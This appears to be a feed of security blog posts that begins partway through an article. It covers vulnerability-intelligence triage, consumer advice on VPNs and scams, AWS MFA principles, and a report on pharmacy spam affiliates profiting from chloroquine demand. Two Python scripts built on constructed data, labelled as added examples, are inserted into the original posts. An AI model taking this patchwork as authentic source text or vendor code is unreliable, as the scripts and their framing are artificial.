Data-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization’s appropriate use of resources for security given the potential business impact of security incidents.

3. Threat Modeling

Organizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.


The following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.

Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization

The FireEye Intelligence Vulnerability Explorer (“FIVE”) tool is available for customers here. It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.

Figure 4: FIVE Tool for Windows and MacOS

In this scenario, an organization’s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. 

Figure 5: FIVE tool startup screen waiting for file input

Figure 6: FIVE tool after successfully regexing the CVE-IDs from the file

After selecting all CVE-IDs, the user clicked the “Fetch Vulnerabilities” button, causing the application to make the necessary two-stage API call to the Intelligence API.

The output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye’s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.

Figure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports

FIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization’s vulnerability management program.

Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling

CVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and Chinese espionage group, APT41.

In cases like these, threat intelligence can help impacted organizations find the “signal” in the “noise” and prioritize patching using knowledge of exploitation and the motives and targeting patterns of the threat actors behind it. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state-sponsored group. This supports the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.

Example 3: Intelligence Reduces Unnecessary Resource Expenditure — Automating Vulnerability Prioritization and Communications

Another common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes helps an organization discern when it is actually necessary to respond in an all-hands-on-deck manner.

Take the case of CVE-2019-12650, originally disclosed on Sept. 25, 2019 with an NVD rating of “High.” Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, our experts reviewed the vulnerability and determined that it required the highest level of privileges available to successfully exploit, and that there was no evidence of exploitation in the wild.

This is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as “low” risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.
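The two workflows described above, pulling CVE IDs out of an arbitrary text file with a regular expression (Example 1) and letting an analyst rating rather than the public score decide whether a patch goes out-of-band (Example 3), can be scripted together. The following is an added example and not FireEye/Mandiant code or the FIVE tool's own logic; the rating table is constructed for illustration, and only the two ratings the article states (CVE-2019-19781 critical, CVE-2019-12650 low despite an NVD High) are taken from the text. The scan file is likewise constructed.

```python
"""Added example (not FireEye/Mandiant or FIVE code): regex extraction of CVE IDs
from a free-form file, then a patch-prioritisation decision keyed on an analyst
risk rating and observed exploitation rather than on the public score alone."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Case-insensitive and tolerant of "CVE 2019 1234" style separators that scanner
# exports and ticket text sometimes contain. The sequence part is 4 or more digits.
CVE_RE = re.compile(r"\bCVE[-\s]?(\d{4})[-\s]?(\d{4,})\b", re.IGNORECASE)


def extract_cves(text: str) -> List[str]:
    """Return normalised, de-duplicated CVE IDs in order of first appearance."""
    seen: Dict[str, None] = {}
    for year, seq in CVE_RE.findall(text):
        seen.setdefault(f"CVE-{year}-{seq}", None)
    return list(seen)


# Constructed intelligence feed. "nvd" is the public severity, "intel" the analyst
# risk rating, "exploited" whether in-the-wild exploitation was observed. Only the
# two article CVEs carry ratings from the text; CVE-2020-0001 is an invented entry.
RATINGS: Dict[str, Dict[str, object]] = {
    "CVE-2019-19781": {"nvd": "Critical", "intel": "critical", "exploited": True},
    "CVE-2019-12650": {"nvd": "High", "intel": "low", "exploited": False},
    "CVE-2020-0001": {"nvd": "Medium", "intel": "medium", "exploited": False},
}


@dataclass
class Decision:
    cve: str
    action: str  # "out-of-band", "regular-cycle" or "review"
    reason: str


def prioritise(cves: List[str], ratings: Dict[str, Dict[str, object]]) -> List[Decision]:
    """Decide, per CVE, whether it needs an out-of-band patch, can wait for the
    regular cycle, or has no intelligence coverage and needs a human look."""
    decisions = []
    for cve in cves:
        info = ratings.get(cve)
        if info is None:
            decisions.append(Decision(cve, "review", "no intelligence rating available"))
            continue
        urgent = info["intel"] in ("critical", "high") or info["exploited"]
        if urgent:
            why = "exploited in the wild" if info["exploited"] else f"intel rating {info['intel']}"
            decisions.append(Decision(cve, "out-of-band", why))
        else:
            why = f"intel rating {info['intel']}, no exploitation observed (NVD {info['nvd']})"
            decisions.append(Decision(cve, "regular-cycle", why))
    return decisions


# Constructed scan output, the kind of file a rebuilt server's scan might yield.
SAMPLE_SCAN = """Host web01 rebuilt from backup image
Finding: cve-2019-19781 Citrix
Finding: CVE-2019-12650 (NVD High)
Finding: CVE-2019-19781 (duplicate from a second plugin)
Finding: CVE-2020-0001
Finding: CVE-2099-99999 (constructed ID, absent from the feed)
"""


def triage_file(text: str) -> List[Decision]:
    """End-to-end: extract IDs from the file, then prioritise them."""
    return prioritise(extract_cves(text), RATINGS)


if __name__ == "__main__":
    for d in triage_file(SAMPLE_SCAN):
        print(f"{d.cve:16} {d.action:14} {d.reason}")
```

The same `Decision` records are what an automated ticketing hook would attach to the patch ticket, so the "regular-cycle" verdict for CVE-2019-12650 arrives with the reasoning (low analyst rating, no exploitation) that the internal communication to stakeholders needs.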

Vulnerabilities: Managed

Because we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.

Mandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps—not just patching—to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Additional Resources

Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill — Intelligence for Vulnerability Management, Part One

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

Mandiant offers Intelligence Capability Development (ICD) services to help organizations optimize their ability to consume, analyze and apply threat intelligence.

The FIVE tool is available on the FireEye Market. It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. 

Mandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.

Weekly Update 188


It's a day late because somehow, even in the current climate, I still find myself with a lot on my plate and the 2am getup yesterday morning didn't leave me much like talking by the usual time I'd record this video came around. Regardless, I haven't missed a week yet and I wasn't going to start today! No great single stories of significance this week but I thought I'd share some insights into how life is gradually returning to a new kind of normal here. We've fared exceptionally well in Australia and I'm conscious many people watching this are in very different situations, this is merely my experience and what my daily life looks like at present.



  1. The COVID19 Australia Twitter account is a great source of empirical data (we're weathering the pandemic exceptionally well down here)
  2. The next workshop I'll be doing is "in" Oslo for NDC in June (this will be my 7th NDC Oslo, just the first one, well, not actually in Oslo!)
  3. Nanoleaf is kinda cool 😎 (I feel like it would be easy to go overboard with these...)
  4. Amazon has won the tender to host data from Australia's COVID-19 tracing app (yes, it's an American company but no, that doesn't matter)
  5. I mentioned "The Belfast Case" as it relates to Microsoft and customer data stored in overseas (that's an important precedent in discussions like these)
  6. Nintendo is at the receiving end of a credential stuffing attack (despite some people claiming their passwords were "strong and unique", it has all the hallmarks of so many incidents that have come before it)
  7. Sponsored by Varonis. SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Connect With Confidence: Benefits of Using a Personal VPN 

Protect your digital life 

The recent surge in work from home is likely accompanied by a corresponding increase in corporate VPN (virtual private network) usage. More and more employees who would typically be connected at the office are using these protected networks to access confidential documents and sites. To some, these corporate VPNs are simply a tunnel into their work lives. But what about the benefits of a personal VPN? What is a VPN exactly, and why use one?

Encrypt your data 

While a home network with a strong password can help set a good foundation for your digital safety, it is worth considering additional privacy fortifications as more devices connect (and perhaps stay connected for longer periods of time). Whether it’s kids taking their classes and gaming online or parents trying to run errands remotely, we want to help you protect your digital life.

At their cores, a corporate VPN and personal VPN perform the same functions. They encrypt (or scramble) your data when you connect to the Internet and enable you to browse or bank in confidence with your credentials and history protected. Should there be any malicious actors attempting to intercept your web traffic, they would only be able to see garbled content thanks to your VPN’s encryption functionality.  

Need for VPN 

Constant online connection is becoming the new normal as we limit the time we spend outdoors. And, as the number of devices online increases, so does the number of threats.  

With many retailers reducing their physical footprints or even closing entirely, such services have shifted online – whether you prefer it or not. Learn how to navigate this changing digital landscape with the following VPN tips and tricks below.  

One classic cyberattack is the “man-in-the-middle,” especially prevalent in places with public Wi-Fi connections such as cafes or open Wi-Fi connections at an apartment building. Malicious actors take advantage of weak network security to intercept and read potentially sensitive information such as bank login credentials or even credit card information. A strong VPN with bank-grade encryption can render this attack useless and help keep sensitive data away from prying eyes.

Which VPN should I choose? 

Not all VPNs are created equal! Make sure that the service you select meets your needs:  

Browser vs Desktop/Mobile 

A browser-level VPN acts as an extension and will only help protect web traffic on the specific browser it is installed on. While this degree of privacy may work for some users, a device-level VPN such as McAfee® Safe Connect can generally help protect web traffic regardless of browser or application selected.  

Level of Security 

It is important to review each service’s privacy terms before you decide which one to use as your trusted gateway. Some VPN services, especially free ones, implement trackers that record your demographic, location, and system information. You can sometimes refer to third party security audits to help validate these privacy claims.  


Depending on how much you plan to use your VPN, you can consider searching for services that have either limited or unlimited data plans. If you plan to consume multimedia such as streaming video or uploading large files, an unlimited plan may work better for you.  

Variety of locations 

For general use, it is advisable to let your VPN connect to the nearest and fastest server location. But, having a diverse list of countries to choose from will allow you greater flexibility if the server is slow in one location.  

Ease of Use 

Ultimately, you should choose a VPN that’s easy to use and understand. We are all embarking on digital journeys from different places of technical comfort, but consider starting with products that offer a streamlined and simplified experience.  

If you’d like to learn more about VPNs, read more here, or dive into VPNs for Android and iOS


Stay Ahead of Misinformation – 5 Ways to Combat Fake News


Finding information in this increasingly digital world has never been easier. Our mobile phones dictate top headlines before we even get out of bed, and even our routers can perform complex searches via voice. We see the impact of this easy access on both our consumption and the sharing of information. Just as it’s easy for us to perform a quick search and send the relevant results to our social groups, it’s also simple for bad actors to create and post fake news on seemingly legitimate platforms. In times of uncertainty, it is natural to go online in search of facts, or the latest update. Now is a great time to brush up on your digital hygiene and best practices to stay ahead of evolving threats.

Fake news 

As we’ve learned this year, a lot can change very quickly. We all want to stay up to date on worldwide trends, announcements, or even the elections. This expanded focus on current events opens an opportunity for bad actors. Panic-inducing rumors can be labeled as sensational at best. However, there are also malicious promises made via phishing scams that attempt to hook worried and confused consumers into credit card fraud or other payment schemes. Sticking to legitimate news sources is one of the easiest ways to avoid such traps.

Chain mail craze 

Not only should you validate your personal newsfeed, you should also hold your social networks to this sanitized standard. While well-intentioned, rumors and fake news often spread through the social grapevine, e.g. “my friend saw this on WeChat” or “look at what someone sent me on Facebook.” These updates may feel more relatable since we’re hearing them from someone we know, but keep in mind that social media chain mail is often lacking in factual accuracy. By verifying what you see against legitimate information sources, you can help family and friends stay both diligent and in the know.

“Dear Sir/Madam”

Phishing scams also come out in full force during moments of public panic. We’ve seen numerous spoofed emails and text messages that claim to be from local governments, hospitals, or even retailers encouraging targets to take action on urgent items. These notices range from falsified instructions for claiming relief checks to scheduling medical check-ups. Some of these phishing emails may be easy to spot as fakes, but the sensitivity of the current environment may cloud our judgment. If you have any doubts about the legitimacy of these messages, you can always reach out to the known institution through official channels to verify.

Charity imposters 

One of the great things about extraordinary moments like these is the outpouring of compassion and empathy from the global community. Sadly, cybercriminals take advantage of this generosity as well. Bad actors have stood up fake charity sites and platforms in the name of donating resources to underserved populations or supporting research. In reality, these may be scams, and any donations received will never see the light of day. It is a best practice to always research charity organizations before you contribute – especially now.

Protect yourself from misinformation 

Take a look at some tips and tools below that you can use to stay ahead of misinformation: 

  • Exercise caution when taking action on emails, texts, and phone calls from unfamiliar sources. Often these messages impersonate legitimate entities or people we may know – reach out to the sender directly if you have doubts. 
  • Use a free safe browsing extension like McAfee® WebAdvisor that integrates website reputation ratings that can help steer you away from illegitimate news sites. For Chrome users, WebAdvisor will even color-code links in your social media newsfeeds, so you’ll know which ones are safe to click. 
  • Avoid websites with suspicious URLs or designs that look hastily put together. Check to make sure the site has a secure connection and starts with “https” rather than “http.” 
  • Some identity theft protection services include social media monitoring to help make sure your accounts aren’t being used by bad actors to spread fake news. 
  • Parental controls can keep tabs on kids’ screen time, helping limit their time on certain apps or sites that may be more vulnerable to proliferating misinformation.
  • Consider using a comprehensive security suite to ensure your devices and online accounts are protected. 


Online shopping scams – 7 ways to fight them 



While some of us may be quite skilled at finding miscellaneous gadgets and great deals on apparel online, relying on ecommerce platforms for all of our basic household needs is a new challenge. Many of us preferred to shop at brick and mortar retail for certain purchases such as groceries or pharmaceuticals. Now that we’ve turned online for all our shopping needs, online suppliers have struggled to meet the surge in demand for certain goods, opening a new space for third-party sellers and malicious actors to step in. Since the beginning of the year, the Federal Trade Commission (FTC) has already received over 8,400 complaints regarding consumer scams, and the total reported consumer loss weighs in at $5.85 million. Here are some common scams to be on the lookout for.

Fake Shopping Websites 

Cybercriminals are quick to take advantage of emerging trends or events.  We’ve already seen numerous fake shopping websites claiming to sell hot ticket items like cleaning supplies that may be sold out elsewhere. In reality, these credit card-collecting scams may deliver counterfeit goods or nothing at all. 

Investment Scams  

This same logic applies for investments as well. Scammers may be posing as budding companies attempting to raise capital to build medical equipment. Others may be advertising non-existent hedge funds with guarantees of high returns post-crisis. Regardless of the promised deliverable, be sure to conduct sufficient research prior to making major investment decisions.  

Miracle Cures 

As Time reports, some sites even promote remedies “ranging from colloidal silver to cow manure.” Luckily, the FTC and Food and Drug Administration (FDA) have started cracking down on companies that issue unsupported claims about miracle cures and vaccines.

Test Kits 

At the time of writing, the FDA has not approved the sale or distribution of any home testing kits. While some of these offers have come from legitimate companies that may have relationships with testing labs, most of these have since received and abided by cease and desist notices. Always reference official entities for guidance on testing, such as the CDC (Centers for Disease Control and Prevention) site here.

This doesn’t mean we should halt our online purchasing. If anything, some logistics companies are encouraging us to continue supporting our favorite small retailers through online purchases to keep them afloat in the uncertainty that lies ahead. With many new instances and flavors of cyberattacks popping up overnight, we can help you stay diligent and secure as you adapt to this shift online.

 Shop Safely Online 

Remember to follow the tips below to ensure your safe online shopping efforts are not in vain: 

  • Exercise caution when receiving promotional emails or texts from unknown sources, especially those that make claims too good to be true.  
  • Stay away from unfamiliar ecommerce websites, even if they’re referred by people you know. Some red flags could be nonsensical URLs, misspellings and unprofessional webpage designs. You can also use a free safe browsing extension to help steer you away from illegitimate sites.  
  • Use a mobile security solution to help you stay secure on your mobile devices with automatic security scans.
  • Use a VPN (virtual private network) like McAfee® Safe Connect when conducting sensitive transactions – the data encryption can help ensure your personal information stays protected from prying eyes listening in on your web traffic.
  • Consider using an identity theft protection service to help protect, detect, and correct potential breaches in personal information. 
  • Protect your purchases by looking for sites that begin with “https” instead of “http” – a good way to remember this is “S for secure.” 
  • Use a comprehensive security suite to ensure your devices and online accounts are protected.  



Principles of a Cloud Migration – Security, The W5H – Episode WHAT?


Teaching you to be a Natural Born Pillar!

Last week, we took you through the “WHO” of securing a cloud migration here, detailing each of the roles involved with implementing a successful security practice during a cloud migration. Read: everyone. This week, I will be touching on the “WHAT” of security; the key principles required before your first workload moves.  The Well-Architected Framework Security Pillar will be the baseline for this article since it thoroughly explains security concepts in a best practice cloud design.

If you are not familiar with the AWS Well-Architected Framework, go google it right now. I can wait. I’m sure telling readers to leave the article they’re currently reading is a cardinal sin in marketing, but it really is important to understand just how powerful this framework is. Wait, this blog is html ready – here’s the link: It consists of five pillars that include best practice information written by architects with vast experience in each area.

Since the topic here is Security, I’ll start by giving a look into this pillar. However, I plan on writing about each and as I do, each one of the graphics above will become a link. Internet Magic!

There are seven principles as a part of the security framework, as follows:

  • Implement a strong identity foundation
  • Enable traceability
  • Apply security at all layers
  • Automate security best practices
  • Protect data in transit and at rest
  • Keep people away from data
  • Prepare for security events

Now, a lot of these principles can be solved by using native cloud services and usually these are the easiest to implement. One thing the framework does not give you is suggestions on how to set up or configure these services. While it might reference turning on multi-factor authentication as a necessary step for your identity and access management policy, it is not on by default. Same thing with file object encryption. It is there for you to use but not necessarily enabled on the ones you create.

Here is where I make a super cool (and free) recommendation on technology to accelerate your learning about these topics. We have a knowledge base with hundreds of cloud rules mapped to the Well-Architected Framework (and others!) to help accelerate your knowledge during and after your cloud migration. Let us take the use case above on multi-factor authentication. Our knowledge base article here details the four R’s: Risk, Reason, Rationale, and References on why MFA is a security best practice.

Starting with a Risk Level and detailing why this presents a threat to your configurations is a great way to begin prioritizing findings. It also includes the different compliance mandates and the Well-Architected pillar (obviously Security in this case) as well as descriptive links to the different frameworks to get even more details.

The reason this knowledge base rule is in place is also included. This gives you and your teams context to the rule and helps further drive your posture during your cloud migration. Sample reason is as follows for our MFA Use Case:

“As a security best practice, it is always recommended to supplement your IAM user names and passwords by requiring a one-time passcode during authentication. This method is known as AWS Multi-Factor Authentication and allows you to enable extra security for your privileged IAM users. Multi-Factor Authentication (MFA) is a simple and efficient method of verifying your IAM user identity by requiring an authentication code generated by a virtual or hardware device on top of your usual access credentials (i.e. user name and password). The MFA device signature adds an additional layer of protection on top of your existing user credentials making your AWS account virtually impossible to breach without the unique code generated by the device.”

If Reason is the “what” of the rule, Rationale is the “why” supplying you with the need for adoption.  Again, perfect for confirming your cloud migration path and strategy along the way.

“Monitoring IAM access in real-time for vulnerability assessment is essential for keeping your AWS account safe. When an IAM user has administrator-level permissions (i.e. can modify or remove any resource, access any data in your AWS environment and can use any service or component – except the Billing and Cost Management service), just as with the AWS root account user, it is mandatory to secure the IAM user login with Multi-Factor Authentication.

Implementing MFA-based authentication for your IAM users represents the best way to protect your AWS resources and services against unauthorized users or attackers, as MFA adds extra security to the authentication process by forcing IAM users to enter a unique code generated by an approved authentication device.”

Finally, all the references for each of the risk, reason, and rationale are included at the bottom, which helps provide additional clarity. You’ll also notice remediation steps, the 5th ‘R’ when applicable, which show you how to actually correct the problem.
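The MFA rule walked through above is straightforward to check mechanically once you have an IAM credential report. The following is an added example, not Trend Micro's knowledge-base or remediation code and not an AWS API wrapper: it evaluates "console users without an MFA device" against the CSV that `aws iam get-credential-report` returns (after base64 decoding). The report rows, the reduced column set, and the `ADMIN_USERS` membership are constructed for the example; a real report has further access-key and certificate columns, and administrator status would be derived from policy and group attachments rather than hard-coded.

```python
"""Added example (not Trend Micro or AWS code): evaluate the "MFA on privileged
IAM users" rule against an IAM credential report, producing Risk-style findings
that mirror the knowledge-base layout (risk level, then the reason)."""
import csv
import io
from typing import Dict, List, Set

# Constructed credential report. The real report has more columns; the ones the
# rule needs (user, password_enabled, mfa_active) are kept. The root account row
# reports password_enabled as "not_supported" but a real mfa_active value.
SAMPLE_REPORT = """user,arn,password_enabled,mfa_active
<root_account>,arn:aws:iam::123456789012:root,not_supported,false
alice,arn:aws:iam::123456789012:user/alice,true,true
bob,arn:aws:iam::123456789012:user/bob,true,false
deploy-bot,arn:aws:iam::123456789012:user/deploy-bot,false,false
carol,arn:aws:iam::123456789012:user/carol,true,false
"""

# Constructed: users holding administrator-level permissions. In practice this set
# comes from attached policies and group membership, not from a literal.
ADMIN_USERS: Set[str] = {"bob"}

ROOT = "<root_account>"


def parse_report(report_csv: str) -> List[Dict[str, str]]:
    """Parse the credential report CSV into one dict per principal."""
    return list(csv.DictReader(io.StringIO(report_csv)))


def evaluate_mfa_rule(report_csv: str, admins: Set[str]) -> List[Dict[str, str]]:
    """Return a finding for every principal that can sign in to the console
    without an MFA device. Service users with no console password are skipped,
    since the rule is about interactive logins."""
    findings = []
    for row in parse_report(report_csv):
        user = row["user"]
        can_login = user == ROOT or row["password_enabled"] == "true"
        if not can_login or row["mfa_active"] == "true":
            continue  # no console password, or MFA already enforced
        if user == ROOT:
            risk, reason = "high", "root account has no MFA device"
        elif user in admins:
            risk, reason = "high", "administrator-level user without MFA"
        else:
            risk, reason = "medium", "console user without MFA"
        findings.append({"user": user, "risk": risk, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in evaluate_mfa_rule(SAMPLE_REPORT, ADMIN_USERS):
        print(f"[{f['risk'].upper():6}] {f['user']}: {f['reason']}")
```

Running it against the constructed report flags the root account and the administrator `bob` as high risk and the ordinary console user `carol` as medium, while `alice` (MFA enabled) and `deploy-bot` (no console password) produce nothing, which is the distinction the Rationale text draws between privileged and other IAM users.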

All of this data is provided to the community as Trend Micro continues to be a valued security research firm helping the world be safe for exchanging digital information. Explore all the rules we have available in our public knowledge base:

This blog is part of a multi-part series dealing with the principles of a successful cloud migration.  For more information, start at the first post here:


Unproven Coronavirus Therapy Proves Cash Cow for Shadow Pharmacies

Many of the same shadowy organizations that pay people to promote male erectile dysfunction drugs via spam and hacked websites recently have enjoyed a surge in demand for medicines used to fight malaria, lupus and arthritis, thanks largely to unfounded suggestions that these therapies can help combat the COVID-19 pandemic.

A review of the sales figures from some of the top pharmacy affiliate programs suggests sales of drugs containing hydroxychloroquine rivaled that of their primary product — generic Viagra and Cialis — and that this as-yet-unproven Coronavirus treatment accounted for as much as 25 to 30 percent of all sales over the past month.

A Google Trends graph depicting the incidence of Web searches for “chloroquine” over the past 90 days.

KrebsOnSecurity reviewed a number of the most popular online pharmacy enterprises, in part by turning to some of the same accounts at these invite-only affiliate programs I relied upon for researching my 2014 book, Spam Nation: The Inside Story of Organized Cybercrime, from Global Epidemic to Your Front Door.

Many of these affiliate programs — going by names such as EvaPharmacy, Rx-Partners and Mailien/Alientarget — have been around for more than a decade, and were major, early catalysts for the creation of large-scale botnets and malicious software designed to enslave computers for the sending of junk email.

Their products do not require a prescription, are largely sourced directly from pharmaceutical production facilities in India and China, and are shipped via international parcel post to customers around the world.

In mid-March, two influential figures, President Trump and Tesla CEO Elon Musk, began suggesting that hydroxychloroquine should be more strongly considered as a treatment for COVID-19.

The pharmacy affiliate programs immediately took notice of a major moneymaking opportunity, noting that keyword searches for terms related to chloroquine suddenly were many times more popular than for the other mainstays of their business.

“Everyone is hysterical,” wrote one member of the Russian language affiliate forum gofuckbiz[.]com on Mar. 17. “Time to make extra money. Do any [pharmacy affiliate] programs sell drugs for Coronavirus or flu?”

The larger affiliate programs quickly pounced on the opportunity, which turned out to be a major — albeit short-lived — moneymaker. Below is a screenshot of the overall product sales statistics for the previous 30 days from all affiliates of PharmCash. As we can see, Aralen — a chloroquine drug used to treat and prevent malaria — was the third biggest seller behind Viagra and Cialis.

Recent 30-day sales figures from the pharmacy affiliate program PharmCash.

In mid-March, the affiliate program Rx-Partners saw a huge spike in demand for Aralen and other drugs containing chloroquine phosphate, and began encouraging affiliates to promote a new set of product teasers targeting people anxiously seeking remedies for COVID-19.

Their main promotion page — still online at about-coronavirus2019[.]com — touts the potential of Aralen, generic hydroxychloroquine, and generic Kaletra/Lopinavir, a drug used to treat HIV/AIDS.

An ad promoting various unproven remedies for COVID-19, from the pharmacy affiliate program Rx-Partners.

On Mar. 18, a manager for Rx-Partners said that like PharmCash, drugs which included chloroquine phosphate had already risen to the top of sales for non-erectile dysfunction drugs across the program.

But the boost in sales from the global chloroquine frenzy would be short-lived. Demand for chloroquine phosphate became so acute worldwide that India — the world’s largest producer of hydroxychloroquine — announced it would ban exports of the drug. On Mar. 25, India also began shutting down its major international shipping ports, leaving the pharmacy affiliate programs scrambling to source their products from other countries.

A Mar. 31 message to affiliates working with the Union Pharm program, noting that supplies of Aralen had dried up due to the shipping closures in India.

India recently said it would resume exports of the drug, and judging from recent posts at the aforementioned affiliate site gofuckbiz[.]com, denizens of various pharmacy affiliate programs are anxiously awaiting news of exactly when shipments of chloroquine drugs will continue.

“As soon as India opens and starts mail, then we will start everything, so get ready,” wrote one of Rx-Partners’ senior recruiters. “I am sure that there will still be demand for pills.”

Global demand for these pills, combined with India’s recent ban on exports, have conspired to create shortages of the drug for patients who rely on it to treat chronic autoimmune diseases, including lupus and rheumatoid arthritis.

While hydroxychloroquine has long been considered a relatively safe drug, some people have been so anxious to secure their own stash of the drug that they’ve turned to unorthodox sources.

On March 19, Fox News ran a story about how demand for hydroxychloroquine had driven up prices on eBay for bottles of chloroquine phosphate designed for removing parasites from fish tanks. A week later, an Arizona man died and his wife was hospitalized after the couple ingested one such fish tank product in hopes of girding their immune systems against the Coronavirus.

Despite many claims that hydroxychloroquine can be effective at fighting COVID-19, there is little real data showing how it benefits patients stricken with the disease. The largest test of the drug’s efficacy against Coronavirus showed no benefit in a large analysis of its use in U.S. veterans hospitals. On the contrary, there were more deaths among those given hydroxychloroquine versus standard care, researchers reported.

In an advisory released today, the U.S. Food and Drug Administration (FDA) cautioned against use of hydroxychloroquine or chloroquine for COVID-19 outside of the hospital setting or a clinical trial due to risk of heart rhythm problems.

School #FromHome: The Challenges of Online Learning for Parents and Kids

With classrooms closed and millions of kids faced with schooling at home, parents are wondering how do we make this work? If you’re asking yourself that question, you’re certainly not alone. Earlier this month, we conducted a study, Distance Learning Challenges. We reached out to 1,000 parents of kindergarten through twelfth-grade students in the U.S. and asked for their thoughts.

Our goal of the survey was to better understand what pressures parents are feeling, and we wanted to identify how we could possibly help, even if in some small way, as children take up going to class online. Here’s what parents had to say:

Home School Challenges

The Top Five Difficulties

Whether they have kindergarteners or high school seniors, parents are sharing many of the same pains. Across the board, they are:

1)      Keeping their children focused on schoolwork (instead of other online activities) – 50.31%

2)      Establishing a daily routine – 49.26%

3)      Balancing household responsibilities and teaching – 41.83%

4)      Establishing a wake-up and bedtime schedule – 33.40%

5)      Balancing working from home and teaching – 33.31%

Also making a strong showing were “help understanding the content to be taught,” at 33.20% and “reducing anxiety and depression due to real-world concerns,” at 31.58%.

Top Difficulties by Grade Level

There are nuances by grade level, however. Keeping children on task ranked first or second in all grade levels except for kindergarten, third grade, and twelfth grade. Instead, these parents cited “establishing a daily routine” as their top concern. For their number two concern, kindergarten and third grade students called out “balancing household responsibilities and teaching” as an issue.

Parents of twelfth graders were the only ones to list “reducing anxiety and depression due to real-world concerns” as their second topmost care, at 43%. This is a broad category, yet it includes overall worry about COVID-19, sick family members and friends, or separation from classmates. This is particularly understandable—senior year is one of milestones and leaps ahead in life, all of which have been upended by the need to stay home.

What Devices are Kids Using

Most parents in our survey said that their kids are using a device that’s already in the home. Some children may have their own device, or it may be a device that the family shares (which can introduce pressures of its own). A small percentage (15%) said their children use a device that was purchased specifically for home schooling purposes. Meanwhile, only about 33% of parents said that their child has a device provided by their school for free.

And what are they working on? It appears to be a mix of devices.

  • Laptop computers – 62%
  • Tablets – 40%
  • Desktop computers – 25%
  • 2-in-1 laptop computers – 15%

Helping Where We Can

Different states, cities, and individual schools are responding to the need for homeschooling in their own way, which means that the situation from family to family (or even child to child) will differ. The common thread is that we’re all learning how to manage our day and to make the best of learning at home in the most challenging of circumstances.

With that in mind, we’re producing a series of articles on School #FromHome, written in conjunction with educators who are facing the same challenges you are. Our aim is to offer you some specific advice and resources to help make it all easier as you determine what learning at home looks like for your child and your family. Look for these articles right here on the McAfee blog.


Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post School #FromHome: The Challenges of Online Learning for Parents and Kids appeared first on McAfee Blogs.

School #FromHome: Bring Structure to Your Day

